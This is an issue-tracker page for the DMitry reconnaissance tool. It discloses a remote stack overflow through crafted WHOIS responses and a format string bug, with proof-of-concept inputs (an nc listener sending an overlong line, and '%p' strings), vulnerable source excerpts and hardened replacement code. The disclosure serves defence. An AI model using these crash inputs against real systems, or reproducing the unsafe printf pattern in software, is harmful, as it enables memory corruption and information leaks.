
dmitry's People

Contributors

carter-yagemann, jaygreig86


dmitry's Issues

Remote Stack Overflow (possible RCE)

Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connections are unencrypted TCP.

This is distinctly different from CVE-2017-7938 because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code.

PoC:

For simplicity, I'm going to redirect DMitry's WHOIS query by modifying my local /etc/hosts:

127.0.0.1       Af.whois-servers.net

Next, I use nc to act as the WHOIS server:

echo -e "Domain Name: foo\nDomain Status: bar\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | sudo nc -q 5 -l -p 43

While that's running, let's see what happens in DMitry:

$ gdb ./dmitry 
[...]
(gdb) r -w EAf
Starting program: [...]/dmitry -w EAf
Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for EAf
Continuing with limited modules
HostIP:
HostName:EAf

Gathered Inic-whois information for EAf
---------------------------------
Domain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaA����Aa@����A����Aa@����A����Aa@�H������BUUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�---------------------------------
�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�----------------------�����---------8����--�fUUUU

Program received signal SIGSEGV, Segmentation fault.
0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
141		if ( strlen(frmtdbuff) ) linetodo = 1;
(gdb) bt
#0  0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
#1  0x4141555555557dfc in ?? ()
#2  0x4141414141414141 in ?? ()
#3  0x41417fffffffe240 in ?? ()
#4  0x4e206e69616d6f44 in ?? ()
#5  0x6f6f66203a656d61 in ?? ()
#6  0x206e69616d6f440a in ?? ()
#7  0x203a737574617453 in ?? ()
#8  0x414141410a726162 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
[...]

Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.
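The bug class reported above is an over-long WHOIS response line being copied into a fixed-size stack buffer. The following is an added example, not code from the DMitry project or from the issue author, of the defensive pattern that prevents it: every line of an untrusted TCP response is copied with an explicit bound, an over-long line is truncated and counted rather than written past the buffer, and the result is printed as data. The 128-byte buffer size mirrors the 128-byte `linebuff` in nwhois.c; the function names, the `line_stats` structure and the sample response (the two header lines followed by a 300-byte line) are assumptions constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed fixed stack buffer size, chosen to match the 128-byte
   linebuff in nwhois.c (assumption for this example). */
#define WHOIS_LINE_BUF 128

struct line_stats {
    int lines;      /* lines delivered to the caller */
    int truncated;  /* lines longer than the buffer that were cut short */
};

/* Copy one line from src (srclen bytes) into dst (capacity dstsz) without
   ever writing past dst. Bytes that do not fit are dropped and *trunc is set.
   Returns the number of bytes consumed from src, including the newline. */
size_t copy_bounded_line(char *dst, size_t dstsz, const char *src,
                         size_t srclen, int *trunc)
{
    size_t i = 0, n = 0;
    *trunc = 0;
    while (i < srclen && src[i] != '\n') {
        if (n + 1 < dstsz) {       /* keep one byte for the terminator */
            dst[n++] = src[i];
        } else {
            *trunc = 1;            /* excess is discarded, not overflowed */
        }
        i++;
    }
    dst[n] = '\0';
    if (i < srclen && src[i] == '\n') i++;   /* consume the newline */
    return i;
}

/* Walk a raw WHOIS response one bounded line at a time. The loop always
   makes progress: copy_bounded_line consumes at least one byte per call. */
struct line_stats process_whois_response(const char *resp, size_t resp_len)
{
    struct line_stats st = {0, 0};
    char linebuff[WHOIS_LINE_BUF];
    size_t off = 0;
    while (off < resp_len) {
        int trunc;
        off += copy_bounded_line(linebuff, sizeof linebuff,
                                 resp + off, resp_len - off, &trunc);
        st.lines++;
        if (trunc) st.truncated++;
        printf("%s\n", linebuff);  /* printed as data, never as a format */
    }
    return st;
}

/* Constructed sample: two ordinary header lines and one 300-byte line,
   the shape of the response used in the report above. */
struct line_stats demo_stats(void)
{
    static char resp[600];
    size_t len = 0;
    len += (size_t)sprintf(resp + len, "Domain Name: foo\n");
    len += (size_t)sprintf(resp + len, "Domain Status: bar\n");
    memset(resp + len, 'A', 300);
    len += 300;
    resp[len++] = '\n';
    return process_whois_response(resp, len);
}

int main(void)
{
    struct line_stats st = demo_stats();
    printf("lines=%d truncated=%d\n", st.lines, st.truncated);
    return 0;
}
```

With the sample response the third line is cut to 127 bytes and reported as truncated instead of smashing the stack; a caller that wants the full line can grow a heap buffer, but a fixed stack buffer must never be filled by data whose length the peer controls.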

Format String Vulnerability (Arbitrary Read/Write, possible Arbitrary Code Execution)

I realize this repository is no longer being actively maintained, but for those who still find the program useful, be aware that there is a serious format string vulnerability, so please carefully validate your inputs!

PoC:

$ ./dmitry "%p %p %p %p %p %p"

Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for %p %p %p %p %p %p
Continuing with limited modules
HostIP:
HostName:%p %p %p %p %p %p

Gathered Inic-whois information for 0x5598e89e9b47 (nil) (nil) 0x7ffc2f4878e0 0x7f721845de80 (nil)
[...]

A maliciously crafted input can achieve arbitrary read/write, potentially leading to arbitrary code execution.

Root Cause:

The function get_nwhois passes linebuff, which contains content from the command line, to print_line:

dmitry/src/nwhois.c

Lines 3 to 28 in 5ad492c

int get_nwhois(char *host)
{
    int hostn;
    char fhost[128]; /* Host with www removed */
    char linebuff[128];
    char server[64];
    int ctr;
    linetodo = 0;
    if ( strlen(outputfile) ) file_open();
    /* remove www. */
    memset(fhost, '\0', sizeof(fhost));
    if ( host[0] == 'w' && host[1] == 'w' && host[2] == 'w' && host[3] == '.'&& strlen(host) > 9 ) {
        ctr = 4;
        do {
            if ( host[ctr] != '\n' && host[ctr] != '\0' ) fhost[ctr-4] = host[ctr];
            ctr++;
        } while ( host[ctr] != '\n' && host[ctr] != '\0' );
    }
    else strcpy(fhost, host);
    /* Print introduction to function */
    memset(linebuff, '\0', sizeof(linebuff));
    snprintf(linebuff, sizeof(linebuff), "\nGathered Inic-whois information for %s\n", fhost);
    print_line(linebuff);

This eventually reaches printf as the format string argument:

dmitry/src/output.c

Lines 3 to 29 in 5ad492c

void print_line(char *string, char *string2)
{
    int ctr;
    int ctr2;
    char sendbuff[255];
    char timebuff[5];
    char timebuff2[5];
    struct tm *timenow;
    time_t now;
    if ( strlen(outputfile) ){
        memset(sendbuff, '\0', sizeof(sendbuff));
        ctr = 0;
        ctr2 = 0;
        do {
            if ( string[ctr] == '%' && string[ctr + 1] == 's' ){
                strcat(sendbuff, string2);
                ctr += 2;
            }
            sendbuff[strlen(sendbuff)] = string[ctr];
            ctr ++;
        } while ( string[ctr] != '\0' );
        fputs(sendbuff, wfp);
    }
    printf(string, string2);

This is a very unsafe usage of printf.
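A hardened replacement for the pattern shown above, added here as an example and not taken from the DMitry project or the issue author: the single `%s` placeholder that `print_line` supports is expanded by hand into a bounded buffer, every other byte of the caller's string is treated as literal text, and the result is written with `fputs`, so the text is never handed to `printf` as a format. The 255-byte buffer size mirrors `sendbuff` in output.c; the function names (`format_line_safe`, `print_line_safe`, `put_byte`) and the sample strings are assumptions for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Same size as sendbuff in output.c (assumption for this example). */
#define SENDBUFF_SIZE 255

/* Append one byte to out, keeping it NUL-terminated.
   Returns 0, or -1 when the byte does not fit. */
static int put_byte(char *out, size_t outsz, size_t *n, char c)
{
    if (*n + 1 >= outsz) return -1;
    out[(*n)++] = c;
    out[*n] = '\0';
    return 0;
}

/* Expand the one "%s" placeholder print_line supports; every other byte of
   'string' (including any other '%' sequence) is copied literally. The output
   is always NUL-terminated and at most outsz-1 bytes long.
   Returns 0 on success, -1 if anything had to be dropped. */
int format_line_safe(char *out, size_t outsz, const char *string,
                     const char *string2)
{
    size_t n = 0;
    int rc = 0;
    if (outsz == 0) return -1;
    out[0] = '\0';
    for (size_t i = 0; string[i] != '\0'; i++) {
        /* reading string[i+1] is safe because string[i] is not the NUL */
        if (string[i] == '%' && string[i + 1] == 's' && string2 != NULL) {
            for (const char *p = string2; *p != '\0'; p++)
                if (put_byte(out, outsz, &n, *p)) rc = -1;
            i++;                       /* skip the 's' of "%s" */
            continue;
        }
        if (put_byte(out, outsz, &n, string[i])) rc = -1;
    }
    return rc;
}

/* Hardened print_line: the expanded text is written as data with fputs,
   never passed to printf as a format. Returns format_line_safe's status. */
int print_line_safe(FILE *fp, const char *string, const char *string2)
{
    char sendbuff[SENDBUFF_SIZE];
    int rc = format_line_safe(sendbuff, sizeof sendbuff, string, string2);
    fputs(sendbuff, fp);
    return rc;
}

int main(void)
{
    /* Constructed input mirroring the report: the host name carries "%p"s. */
    print_line_safe(stdout, "\nGathered Inic-whois information for %s\n",
                    "%p %p %p %p %p %p");
    return 0;
}
```

Run stand-alone, the program prints the `%p` sequence literally rather than leaking stack values. The same rule applies to any remaining `printf`, `fprintf` or `syslog` call in the code base: a string that can carry user data belongs in an argument, with `"%s"` as the format, never in the format position itself.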

*** Buffer overflow detected ***:dmitry terminated error.

I get the following error when I issue the following command. The error is generated in the middle of the process.

dmitry -winsepo hackthissite.txt hackthissite.org

Error:

*** buffer overflow detected ***: dmitry terminated
Segmentation fault

Segmentation Fault when reading banner

I'm trying to read banners from a host in my local network and came across this problem.

System: Linux kali 6.0.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.10-2kali1 (2022-12-06) x86_64 GNU/Linux, VM running on VirtualBox

Version: DMitry/1.3a (Unix)

Error: zsh: segmentation fault dmitry -bp 192.168.15.1
